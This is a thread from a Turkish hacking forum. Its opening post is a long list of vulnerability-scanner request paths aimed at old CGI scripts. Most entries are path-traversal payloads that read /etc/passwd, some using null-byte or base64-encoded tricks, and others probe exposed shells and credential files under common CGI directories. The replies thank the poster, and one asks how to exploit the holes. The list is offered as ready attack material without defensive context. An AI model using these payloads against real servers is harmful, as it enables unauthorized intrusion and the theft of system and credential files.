/cgi-sys/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
/cgi-local/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
/htbin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
/cgibin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
/cgis/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
/scripts/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
/cgi-win/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
/bin/architext_query.cgi
/cgi/architext_query.cgi
/cgi-bin/architext_query.cgi
/cgi-sys/architext_query.cgi
/cgi-local/architext_query.cgi
/htbin/architext_query.cgi
/cgibin/architext_query.cgi
/cgis/architext_query.cgi
/scripts/architext_query.cgi
/cgi-win/architext_query.cgi
/bin/architext_query.pl
/cgi/architext_query.pl
/cgi-bin/architext_query.pl
/cgi-sys/architext_query.pl
/cgi-local/architext_query.pl
/htbin/architext_query.pl
/cgibin/architext_query.pl
/cgis/architext_query.pl
/scripts/architext_query.pl
/cgi-win/architext_query.pl
/bin/ash
/cgi/ash
/cgi-bin/ash
/cgi-sys/ash
/cgi-local/ash
/htbin/ash
/cgibin/ash
/cgis/ash
/scripts/ash
/cgi-win/ash
/bin/AT-admin.cgi
/cgi/AT-admin.cgi
/cgi-bin/AT-admin.cgi
/cgi-sys/AT-admin.cgi
/cgi-local/AT-admin.cgi
/htbin/AT-admin.cgi
/cgibin/AT-admin.cgi
/cgis/AT-admin.cgi
/scripts/AT-admin.cgi
/cgi-win/AT-admin.cgi
/bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
/cgi/auktion.cgi?menue=../../../../../../../../../../etc/passwd
/cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
/cgi-sys/auktion.cgi?menue=../../../../../../../../../../etc/passwd
/cgi-local/auktion.cgi?menue=../../../../../../../../../../etc/passwd
/htbin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
/cgibin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
/cgis/auktion.cgi?menue=../../../../../../../../../../etc/passwd
/scripts/auktion.cgi?menue=../../../../../../../../../../etc/passwd
/cgi-win/auktion.cgi?menue=../../../../../../../../../../etc/passwd
/bin/auth_data/auth_user_file.txt
/cgi/auth_data/auth_user_file.txt
/cgi-bin/auth_data/auth_user_file.txt
/cgi-sys/auth_data/auth_user_file.txt
/cgi-local/auth_data/auth_user_file.txt
/htbin/auth_data/auth_user_file.txt
/cgibin/auth_data/auth_user_file.txt
/cgis/auth_data/auth_user_file.txt
/scripts/auth_data/auth_user_file.txt
/cgi-win/auth_data/auth_user_file.txt
/bin/ax-admin.cgi
/cgi/ax-admin.cgi
/cgi-bin/ax-admin.cgi
/cgi-sys/ax-admin.cgi
/cgi-local/ax-admin.cgi
/htbin/ax-admin.cgi
/cgibin/ax-admin.cgi
/cgis/ax-admin.cgi
/scripts/ax-admin.cgi
/cgi-win/ax-admin.cgi
/bin/ax.cgi
/cgi/ax.cgi
/cgi-bin/ax.cgi
/cgi-sys/ax.cgi
/cgi-local/ax.cgi
/htbin/ax.cgi
/cgibin/ax.cgi
/cgis/ax.cgi
/scripts/ax.cgi
/cgi-win/ax.cgi
/bin/axs.cgi
/cgi/axs.cgi
/cgi-bin/axs.cgi
/cgi-sys/axs.cgi
/cgi-local/axs.cgi
/htbin/axs.cgi
/cgibin/axs.cgi
/cgis/axs.cgi
/scripts/axs.cgi
/cgi-win/axs.cgi
/bin/banner.cgi
/cgi/banner.cgi
/cgi-bin/banner.cgi
/cgi-sys/banner.cgi
/cgi-local/banner.cgi
/htbin/banner.cgi
/cgibin/banner.cgi
/cgis/banner.cgi
/scripts/banner.cgi
/cgi-win/banner.cgi
/bin/bannereditor.cgi
/cgi/bannereditor.cgi
/cgi-bin/bannereditor.cgi
/cgi-sys/bannereditor.cgi
/cgi-local/bannereditor.cgi
/htbin/bannereditor.cgi
/cgibin/bannereditor.cgi
/cgis/bannereditor.cgi
/scripts/bannereditor.cgi
/cgi-win/bannereditor.cgi
/bin/bash
/cgi/bash
/cgi-bin/bash
/cgi-sys/bash
/cgi-local/bash
/htbin/bash
/cgibin/bash
/cgis/bash
/scripts/bash
/cgi-win/bash
/bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
/cgi/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
/cgi-sys/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
/cgi-local/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
/htbin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
/cgibin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
/cgis/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
/scripts/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
/cgi-win/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
/bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
/cgi/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
/cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
/cgi-sys/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
/cgi-local/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
/htbin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
/cgibin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
/cgis/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
/scripts/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
/cgi-win/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
/bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi 4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/cgi/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi 4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi 4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK


ALINTIDIR...



Facebook sayfamızı beğenin.
    
Offline  
Alıntı ile Cevapla
Bu üyeler sensiz271 nickli üyenin mesajına teşekkür etti
furkan72 (24-07-2013)
Alt 24-07-2013   #2
  • Offline
  • Teğmen
  • Genel Bilgiler
Üyelik tarihi
Jul 2013
Mesajlar
Konular
Ettiği Teşekkür
5
9 Mesajına
10Teşekkür Aldı
  


emeğe saygı teşekkürler



Facebook sayfamızı beğenin.
    
Offline  
Alıntı ile Cevapla
Bu üyeler hacker sse nickli üyenin mesajına teşekkür etti
sensiz271 (24-07-2013)
Alt 24-07-2013   #3
  • Offline
  • Yarbay
  • Genel Bilgiler
Üyelik tarihi
Jul 2013
Nerden
C:\Linux
Mesajlar
Konular
Ettiği Teşekkür
94
96 Mesajına
123Teşekkür Aldı
  


kısa ve alt alta olanları kod içinde yazsaydın keşke :S

Yinede eline sağlık



Facebook sayfamızı beğenin.
    



__________________
Öfkene hakim olamıyorsan;
Niye yaşıyorsun?

-->Muslims Freedom!!!<--
Offline  
Alıntı ile Cevapla
Bu üyeler By Ghost nickli üyenin mesajına teşekkür etti
sensiz271 (24-07-2013)
Alt 24-07-2013   #4
  • Offline
  • Asteğmen
  • Genel Bilgiler
Üyelik tarihi
Feb 2012
Mesajlar
Konular
4
Ettiği Teşekkür
7
Thanked 1 Time in 1 Post
  


Tşkr Ederm İşime Yarıcak..



Facebook sayfamızı beğenin.
    
Offline  
Alıntı ile Cevapla
Bu üyeler furkan72 nickli üyenin mesajına teşekkür etti
sensiz271 (24-07-2013)
Alt 24-07-2013   #5
  • Offline
  • Binbaşı
  • Genel Bilgiler
Üyelik tarihi
Nov 2009
Mesajlar
Konular
Ettiği Teşekkür
83
40 Mesajına
43Teşekkür Aldı
  


Keşke bi arşiv haline getiripte rar dosyasına atsaydın öyle daha iyi olurdu



Facebook sayfamızı beğenin.
    



__________________
shadow-mavi
Adamın Kralı Dediğim Bu Olsa Gerek
Offline  
Alıntı ile Cevapla
Bu üyeler gokmen202 nickli üyenin mesajına teşekkür etti
sensiz271 (24-07-2013)
Alt 24-07-2013   #6
  • Offline
  • Üsteğmen
  • Genel Bilgiler
Üyelik tarihi
Jul 2013
Nerden
Hatay Hassa
Yaş
19
Mesajlar
Konular
Ettiği Teşekkür
51
8 Mesajına
8Teşekkür Aldı
  


aynen bende hepinize tşk ederim



Facebook sayfamızı beğenin.
    
Offline  
Alıntı ile Cevapla
Alt 03-08-2013   #7
  • Offline
  • Üsteğmen
  • Genel Bilgiler
Üyelik tarihi
Jul 2013
Nerden
Hatay Hassa
Yaş
19
Mesajlar
Konular
Ettiği Teşekkür
51
8 Mesajına
8Teşekkür Aldı
  


güncel//



Facebook sayfamızı beğenin.
    
Offline  
Alıntı ile Cevapla
Alt 04-08-2013   #8
  • Offline
  • Tuğgeneral
  • Genel Bilgiler
Üyelik tarihi
Jun 2013
Nerden
Nereye...
Mesajlar
Konular
Ettiği Teşekkür
63
98 Mesajına
171Teşekkür Aldı
  


Herşey İyi Güzelde Biz Bu Açıkları Nasıl Kullanıcaz?



Facebook sayfamızı beğenin.
    



__________________
11/02/2014
Hacking İs Over For Me Now !
Offline  
Alıntı ile Cevapla
Alt 05-08-2013   #9
  • Offline
  • Üsteğmen
  • Genel Bilgiler
Üyelik tarihi
Jul 2013
Nerden
Hatay Hassa
Yaş
19
Mesajlar
Konular
Ettiği Teşekkür
51
8 Mesajına
8Teşekkür Aldı
  


güncelll//



Facebook sayfamızı beğenin.
    
Offline  
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler
Stil

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-KodlarıKapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından açılmaktadır.
Bu konular yönetimimiz tarafından takip edilsede gözden kaçabilen telif hakkı olan veya mahkeme kararı çıkmış konular sitemizde bulunabilir. Bu tür konuları bize turkhackteamiletisim[at]gmail.com adresine mail atarak bildirdiğiniz takdirde en kısa sürede konular hakkında gerekli işlemler yapılacaktır.
Please Report Abuse, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim[at]gmail.com


Hiçbir zafer amaç değildir. Zafer, ancak kendisinden daha büyük bir amacı elde etmek için belli başlı bir vasıtadır. (M.KEMAL ATATÜRK)




Powered by vBulletin® Copyright ©2000 - 2013
Tema Desteği: www.tr-vBulletin.com



Search Engine Friendly URLs by vBSEO 3.6.0 ©2011, Crawlability, Inc.